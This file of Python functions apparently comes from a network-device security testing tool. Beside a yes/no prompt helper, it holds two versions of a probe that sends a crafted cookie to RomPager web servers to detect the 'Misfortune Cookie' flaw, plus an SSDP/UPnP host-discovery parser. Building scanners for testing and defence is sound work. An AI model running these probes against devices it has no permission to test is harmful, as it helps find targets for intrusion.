def query_yes_no(question, default="yes"): """Ask a yes/no question via raw_input() and return their answer. "question" is a string that is presented to the user. "default" is the presumed answer if the user just hits <Enter>. It must be "yes" (the default), "no" or None (meaning an answer is required of the user). The "answer" return value is True for "yes" or False for "no". """ valid = {"yes": True, "y": True, "ye": True, "no": False, "n": False} if default is None: prompt = " [y/n] " elif default == "yes": prompt = " [Y/n] " elif default == "no": prompt = " [y/N] " else: raise ValueError("invalid default answer: '%s'" % default) while True: print_yellow(question + prompt) choice = input().lower() if default is not None and choice == '': return valid[default] elif choice in valid: return valid[choice] else: print_red("Please respond with 'yes' or 'no' " "(or 'y' or 'n').\n")
def do_run(self, e): user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' headers = {'User-Agent': user_agent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3', 'Connection': 'keep-alive', 'Accept-Encoding': 'gzip, deflate', 'Cache-Control': 'no-cache', 'Cookie': 'C107373883=/omg1337hax'} target = 'http://' + self.host + ":" + self.port + '/blabla' try: response = requests.get(target, headers=headers, timeout=60) if response.status_code != 404: print_failed("Unexpected HTTP status, expecting 404 got: %d" % response.status_code) print_red("Device is not running RomPager") else: if 'server' in response.headers: server = response.headers.get('server') if re.search('RomPager', server) is not None: print_green("Got RomPager! Server:%s" % server) if re.search('omg1337hax', response.text) is not None: print_success("device is vulnerable to misfortune cookie") else: print_failed("test didn't pass.") print_warning("Device MAY still be vulnerable") else: print_failed("RomPager not detected, device is running: %s " % server) else: print_failed("Not running RomPager") except requests.exceptions.Timeout: print_error("Timeout!") except requests.exceptions.ConnectionError: print_error("No route to host")
def do_run(self, e): #httplib2.debuglevel = 1 user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' headers = {'User-Agent': user_agent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3', 'Connection': 'keep-alive', 'Accept-Encoding': 'gzip, deflate', 'Cache-Control': 'no-cache', 'Cookie': 'C107373883=/omg1337hax'} target = 'http://' + self.host + ":" + self.port + '/blabla' h = httplib2.Http(timeout=60) h.follow_all_redirects = True try: response, content = h.request(target, 'GET', headers=headers) if response.status != 404: print_failed("Unexpected HTTP status, expecting 404 got: %d" % response.status) print_red("Device is not running RomPager") else: if 'server' in response.keys(): server = response.get('server') if re.search('RomPager', server) is not None: print_green("Got RomPager! Server:%s" % server) if re.search('omg1337hax', content.decode()) is not None: print_success("device is vulnerable to misfortune cookie") else: print_failed("test didn't pass.") print_warning("Device MAY still be vulnerable") else: print_failed("RomPager not detected, device is running: %s " % server) else: print_failed("Not running RomPager") except socket.timeout: # Is there a better way of handling timeout in httplib2? print_error("Timeout!")
def parse_ssdp_info(self, data, show_uniq, verbose): data = data.decode('utf-8') # When Ctl-C is pressed data is set to False and exception should be raised host_found = False # found_location = False message_type = None # xml_file = None # host = False # page = False # upnp_type = None known_headers = {'NOTIFY': 'notification', 'HTTP/1.1 200 OK': 'reply'} # Use the class defaults if these aren't specified # if not show_uniq: # show_uniq = self.uniq # if not verbose: # verbose = self.verbose # Is the SSDP packet a notification, a reply, or neither? for text, message_type in known_headers.items(): if data.upper().startswith(text): break else: message_type = False # If this is a notification or a reply message... if message_type: # Get the host name and location of its main UPNP XML file xml_file = self.parse_header(data, "LOCATION") upnp_type = self.parse_header(data, "SERVER") (host, page) = self.parse_url(xml_file) # Sanity check to make sure we got all the info we need if xml_file is None or host is False or page is False: print_error("parsing recieved header:") print_red(data) return False # Get the protocol in use (i.e., http, https, etc) protocol = xml_file.split('://')[0] + '://' # Check if we've seen this host before; add to the list of hosts if: # 1. This is a new host # 2. We've already seen this host, but the uniq hosts setting is disabled for hostID, hostInfo in self.enum_hosts.items(): if hostInfo['name'] == host: host_found = True if self.uniq: return False if (host_found and not self.uniq) or not host_found: # Get the new host's index number and create an entry in ENUM_HOSTS index = len(self.enum_hosts) self.enum_hosts[index] = { 'name': host, 'dataComplete': False, 'proto': protocol, 'xml_file': xml_file, 'serverType': None, 'upnpServer': upnp_type, 'deviceList': {} } # Be sure to update the command completer so we can tab complete through this host's data structure # self.updateCmdCompleter(self.ENUM_HOSTS) # Print out some basic device info print_info("SSDP " + message_type + " message from " + host) if xml_file: # found_location = True print_info("XML file is located at " + xml_file) if upnp_type: print_info("Device is running: " + upnp_type) return True